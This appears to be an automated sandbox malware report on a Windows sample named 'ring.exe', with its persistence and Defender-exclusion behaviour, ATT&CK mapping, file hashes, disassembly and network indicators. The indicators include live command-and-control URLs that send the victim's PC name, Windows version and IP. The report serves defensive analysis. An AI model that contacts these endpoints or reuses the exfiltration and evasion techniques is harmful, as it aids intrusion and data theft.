Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\ring.exe | File opened: \\\VBoxMiniRdrDN
MITRE ATT&CK Matrix (techniques observed in this analysis carry the report's count in parentheses; the remaining entries are the other techniques listed in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (12); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (12); DLL Side-Loading (1); Steganography; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Network Share Discovery (1); Security Software Discovery (111); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1558818 | Sample: ring.exe | Startdate: 19/11/2024 | Architecture: WINDOWS | Score: 84

Start (node 2)
  DNS: adsklbb.org; api64.ipify.org
  Signatures: Suricata IDS alerts for network traffic; Machine Learning detection for sample; AI detected suspicious sample; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
  Started: ring.exe 1 18 (node 9); ring.exe (node 14); ring.exe (node 16)

ring.exe (node 9)
  Network: adsklbb.org 24.152.39.13, ports 49705, 49707, 55417, MasterDaWebBR, unknown; api64.ipify.org 104.237.62.213, ports 49701, 80, WEBNXUS, United States; 154.205.156.20, ports 49702, 80, IKGUL-26484US, Seychelles
  Dropped: C:\Users\user\AppData\Roaming\...\ring.exe (PE32); C:\Users\user\...\ring.exe:Zone.Identifier (ASCII)
  Signatures: Adds a directory exclusion to Windows Defender; Opens network shares
  Started: cmd.exe 1 (node 18)

ring.exe (node 14)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

cmd.exe (node 18)
  Signatures: Adds a directory exclusion to Windows Defender
  Started: powershell.exe 23 (node 21); conhost.exe (node 24)

powershell.exe (node 21)
  Signatures: Loading BitLocker PowerShell Module
  Started: WmiPrvSE.exe (node 26)

Source | Detection | Scanner | Label | Link
ring.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Win_24230\ring.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Win_24230\ring.exe | 18% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://154.205.156.20/Painel/atualiza_update.php | 0% | Avira URL Cloud | safe |
http://154.205.156.20/Painel/atualizar_dados.php | 0% | Avira URL Cloud | safe |
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 | 0% | Avira URL Cloud | safe |
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B | 0% | Avira URL Cloud | safe |


Name | IP | Active | Malicious | Antivirus Detection | Reputation
adsklbb.org | 24.152.39.13 | true | true | | unknown
api64.ipify.org | 104.237.62.213 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 | false | Avira URL Cloud: safe | unknown
http://api64.ipify.org/?format=text | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://154.205.156.20/Painel/atualizar_dados.php | ring.exe, ring.exe.4.dr | false | Avira URL Cloud: safe | unknown
http://www.indyproject.org/ | ring.exe, ring.exe.4.dr | false | | high
http://154.205.156.20/Painel/atualiza_update.php | ring.exe, ring.exe.4.dr | false | Avira URL Cloud: safe | unknown
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B | ring.exe, 00000004.00000002.2527929541.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2529177771.000000000366D000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
154.205.156.20 | unknown | Seychelles | 26484 | IKGUL-26484US | false
104.237.62.213 | api64.ipify.org | United States | 18450 | WEBNXUS | false
24.152.39.13 | adsklbb.org | unknown | 270564 | MasterDaWebBR | true
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1558818
          Start date and time:2024-11-19 20:35:12 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 23s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:ring.exe
          Detection:MAL
          Classification:mal84.spyw.evad.winEXE@9/9@2/3
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ring.exe, PID 6300 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: ring.exe
Time | Type | Description
14:36:15 | API Interceptor | 17x Sleep call for process: powershell.exe modified
14:36:16 | API Interceptor | 1x Sleep call for process: ring.exe modified
20:36:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinSesp C:\Users\user\AppData\Roaming\Win_24230\ring.exe
20:36:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinSesp C:\Users\user\AppData\Roaming\Win_24230\ring.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.237.62.213 | http://ERICADLERCLOTHING.com | malicious | Unknown |
104.237.62.213 | sqlite.dll | malicious | Unknown |
104.237.62.213 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar |
104.237.62.213 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar |
104.237.62.213 | SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer |
104.237.62.213 | 9poHPPZxlB.exe | malicious | LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig |
104.237.62.213 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc |
104.237.62.213 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz |
104.237.62.213 | PM7K6PbAf0.exe | malicious | LummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, Stealc |
104.237.62.213 | FileApp.exe | malicious | LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
api64.ipify.org | http://ERICADLERCLOTHING.com | malicious | Unknown | 104.237.62.213
api64.ipify.org | d1bc91bd44a0.exe | malicious | PrivateLoader, Stealc, Vidar | 173.231.16.77
api64.ipify.org | file.exe | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | 173.231.16.77
api64.ipify.org | sqlite.dll | malicious | Unknown | 104.237.62.213
api64.ipify.org | 66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 173.231.16.77
api64.ipify.org | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 173.231.16.77
api64.ipify.org | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 104.237.62.213
api64.ipify.org | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 173.231.16.77
api64.ipify.org | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 173.231.16.77
api64.ipify.org | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 104.237.62.213

Match | Associated Sample Name / URL | Detection | Threat Name | Context
MasterDaWebBR | Reservation Detail Booking.com ID4336.vbs | malicious | AsyncRAT, PureLog Stealer, zgRAT | 24.152.39.120
MasterDaWebBR | image.ps1 | malicious | AsyncRAT, PureLog Stealer, zgRAT | 24.152.39.120
MasterDaWebBR | 17305370450a724087c7f6981143cf069ec0c685c80f69cbd81880d785e4b0d131e53bb2a9297.dat-decoded.exe | malicious | Njrat | 24.152.38.77
MasterDaWebBR | 17305370457af8060c5c3c6d7e83c17b8f6083a3c41c5dd21323a637c4bf05d8d8bd79484b331.dat-decoded.exe | malicious | Njrat | 24.152.38.77
MasterDaWebBR | 2ktrFR0W3v.exe | malicious | Clipboard Hijacker, Quasar | 24.152.39.227
MasterDaWebBR | DZNtmwlTFY.exe | malicious | Njrat | 24.152.39.227
MasterDaWebBR | j84mNh4z90.exe | malicious | Njrat | 24.152.39.227
MasterDaWebBR | xtuHcaTJtwiA.exe | malicious | Remcos | 24.152.37.147
MasterDaWebBR | zfT2dBXgtH.elf | malicious | Mirai, Okiru | 24.152.39.205
MasterDaWebBR | SYYMW2Y7m2.elf | malicious | Mirai, Okiru | 24.152.39.205
IKGUL-26484US | HZ1ZzlIpm7.vbe | malicious | FormBook | 198.44.251.205
IKGUL-26484US | mpsl.elf | malicious | Mirai | 156.238.135.134
IKGUL-26484US | dvwkja7.elf | malicious | Mirai | 154.90.25.186
IKGUL-26484US | ppc.elf | malicious | Mirai | 156.231.181.91
IKGUL-26484US | tarm7.elf | malicious | Mirai | 156.231.181.98
IKGUL-26484US | tmips.elf | malicious | Mirai | 156.231.181.43
IKGUL-26484US | PO_11000262.vbs | malicious | FormBook | 198.44.251.51
IKGUL-26484US | sora.sh4.elf | malicious | Mirai | 156.249.231.105
IKGUL-26484US | nullnet_load.spc.elf | malicious | Mirai | 156.238.135.144
IKGUL-26484US | nullnet_load.x86.elf | malicious | Mirai | 156.249.132.14
WEBNXUS | https://hacktools.sh/ | malicious | Unknown | 107.182.163.162
WEBNXUS | http://tvdseo.com | malicious | Unknown | 107.182.163.162
WEBNXUS | xd.sh4.elf | malicious | Mirai | 142.4.54.171
WEBNXUS | sora.mips.elf | malicious | Mirai | 192.69.213.181
WEBNXUS | a.hta | malicious | DarkComet, DarkTortilla, Neshta | 216.158.90.138
WEBNXUS | http://ERICADLERCLOTHING.com | malicious | Unknown | 104.237.62.213
WEBNXUS | https://attservicesinc.weebly.com/ | malicious | HTMLPhisher | 67.220.226.233
WEBNXUS | https://www.mediafire.com/file/dl1ll51b96z8hcb/paginas_para_descargar_Vectores_gratis_2018.zip/file | malicious | Unknown | 67.220.228.201
WEBNXUS | gkjeNrdkot.elf | malicious | Mirai | 64.185.231.196
WEBNXUS | d1bc91bd44a0.exe | malicious | PrivateLoader, Stealc, Vidar | 173.231.16.77
                              No context
                              No context
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:Unicode text, UTF-8 text, with no line terminators
                              Category:dropped
                              Size (bytes):200
                              Entropy (8bit):5.103507445471441
                              Encrypted:false
                              SSDEEP:3:ocsHUq8dUV2hcFfL8/jBK8hv1xu9wr0qpE11MGNstDUrZOFdNIAzXPCTK/1VWC:oHW9hcxLs9vHFrRqCwZOFPIAzXIel
                              MD5:22868ABF80E396FB8A7C5F27A82A2C4E
                              SHA1:398C626F408A701A3B83A97C6555E7F26ECBA1DD
                              SHA-256:FDCC20DF3C1D998528B44D2FE027B492BA0206CAAD704E719946F9DF44E86499
                              SHA-512:866347B8E2C7B04D8FE27433D4389B780591F65102F4E30A1DDFE545BE17E7B976907C9C8496D8CA2EE5A056711C6734FBB1E2E3A8761285E1B9E6D607DA18D8
                              Malicious:false
                              Reputation:low
                              Preview:Dados Recebidos:<br>Nome do PC: 960781<br>Vers.o do Windows: Windows 10.0 (Build 19045) <br>.ltima Atualiza..o: 2024-11-19<br>Status: Instalada<br>Dados salvos com sucesso no arquivo desktops.txt!
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.380747059108785
                              Encrypted:false
                              SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:lGLHxvIIwLgZ2KRHWLOugEs
                              MD5:98BD0A3DBC29BD9486474C3069740CE0
                              SHA1:D2D2389EC77D5C090CB7A232747C1E74CD2F3346
                              SHA-256:0BDF783C058C98376CF0951AEB1A960CD03118E836EAFE4977BB5B616AB368E9
                              SHA-512:17B166F024D169FDF4F7F5AC95A53A1380E625B496A0CA04392A7E2538D73F3F8FB70585C6CFC0DA05CD50B45EDDC7B04321B3816D39FE4261F547D6FA900CDC
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):17488384
                              Entropy (8bit):4.786504001985185
                              Encrypted:false
                              SSDEEP:49152:3h+ZMbgw1VoIj5CSYS9o9IpHiYXcaXoMx+q2zAkcq085zXnCC7CWRUFGwhnb1b:3h+ZYD5DXc6oMx7CAkL0iz3T8T1b
                              MD5:DEC85DE31C5A9E3754AB0FCFED8A3E79
                              SHA1:B47C8F4918518F1538842B5B12BC5DCBEA5C3D59
                              SHA-256:FA4F6DA9EA8ACA025D129328CE57B36343A1BC8796D1846D02157D2242F904A8
                              SHA-512:34831FF6C2571F0354BD5958A036A0030C85CAB0C6DCB47C881CB366A47ADF20741D6A473BE369C20A1535FDE380F0BE6BC53C5EDB96D4729A92D4BBF47BF0AA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 18%
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....<g.................XJ..~......TrJ.......J...@.......................................@......@....................L.m....0L..;...@S..v....................L.$.............................L.....................x:L.8....pL......................text....#J......$J................. ..`.itext...2...@J..4...(J............. ..`.data....*....J..,...\J.............@....bss.....{....K..........................idata...;...0L..<....K.............@....didata......pL.......K.............@....edata..m.....L.......K.............@..@.tls....X.....L..........................rdata..].....L.......K.............@..@.reloc..$.....L.......K.............@..B.rsrc....v...@S..v...dR.............@..@....................................@..@................
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):12
                              Entropy (8bit):2.8553885422075336
                              Encrypted:false
                              SSDEEP:3:tR6r:k
                              MD5:2859916D3768B8859995F1AB7D03A74C
                              SHA1:0531F9B1D851BBA2E56C3DDC8B2B173C30E5117F
                              SHA-256:AC19D06F24FE1D63584CA24CF2F30F99A45AE7AFC9AFC9A2F58754B19AC175CD
                              SHA-512:F26287C42157ED198417540B90685C008B15E127BF48117922BDFA8DD42A4A0489D72F11DAC89F22685021C625BF257D430A3901AFB72DF78381E3FEEB1C12AE
                              Malicious:false
                              Preview:2024-11-19..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):4.786504001985185
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.45%
                              • Inno Setup installer (109748/4) 1.08%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              File name:ring.exe
                              File size:17'488'384 bytes
                              MD5:dec85de31c5a9e3754ab0fcfed8a3e79
                              SHA1:b47c8f4918518f1538842b5b12bc5dcbea5c3d59
                              SHA256:fa4f6da9ea8aca025d129328ce57b36343a1bc8796d1846d02157d2242f904a8
                              SHA512:34831ff6c2571f0354bd5958a036a0030c85cab0c6dcb47c881cb366a47adf20741d6a473be369c20a1535fde380f0be6bc53c5edb96d4729a92d4bbf47bf0aa
                              SSDEEP:49152:3h+ZMbgw1VoIj5CSYS9o9IpHiYXcaXoMx+q2zAkcq085zXnCC7CWRUFGwhnb1b:3h+ZYD5DXc6oMx7CAkL0iz3T8T1b
                              TLSH:2907B20A594AD025D6E10FF6E835F29CD826FF381B94842D45523ABA49F34E12D2EF37
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:1c0d51316e630605
                              Entrypoint:0x8a7254
                              Entrypoint Section:.itext
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x673CD9EA [Tue Nov 19 18:33:14 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:5d836336e2a3e8a72b29dc47ad486ef9
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFF0h
                              push ebx
                              mov eax, 00896CA8h
                              call 00007FB1D43B9E58h
                              mov ebx, dword ptr [008BA2B8h]
                              mov eax, dword ptr [ebx]
                              call 00007FB1D45C856Bh
                              mov eax, dword ptr [ebx]
                              xor edx, edx
                              call 00007FB1D45CA54Eh
                              mov eax, dword ptr [ebx]
                              mov byte ptr [eax+6Fh], 00000000h
                              mov ecx, dword ptr [008BA7D0h]
                              mov eax, dword ptr [ebx]
                              mov edx, dword ptr [008903C8h]
                              call 00007FB1D45C8561h
                              mov ecx, dword ptr [008BA154h]
                              mov eax, dword ptr [ebx]
                              mov edx, dword ptr [0088F6A4h]
                              call 00007FB1D45C854Eh
                              mov eax, dword ptr [ebx]
                              call 00007FB1D45C86A7h
                              pop ebx
                              call 00007FB1D43B1F8Dh
                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4c8000 | 0x6d | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4c3000 | 0x3bcc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x534000 | 0xb87600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4cb000 | 0x68d24 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4ca000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4c3a78 | 0x938 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4c7000 | 0xcba | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
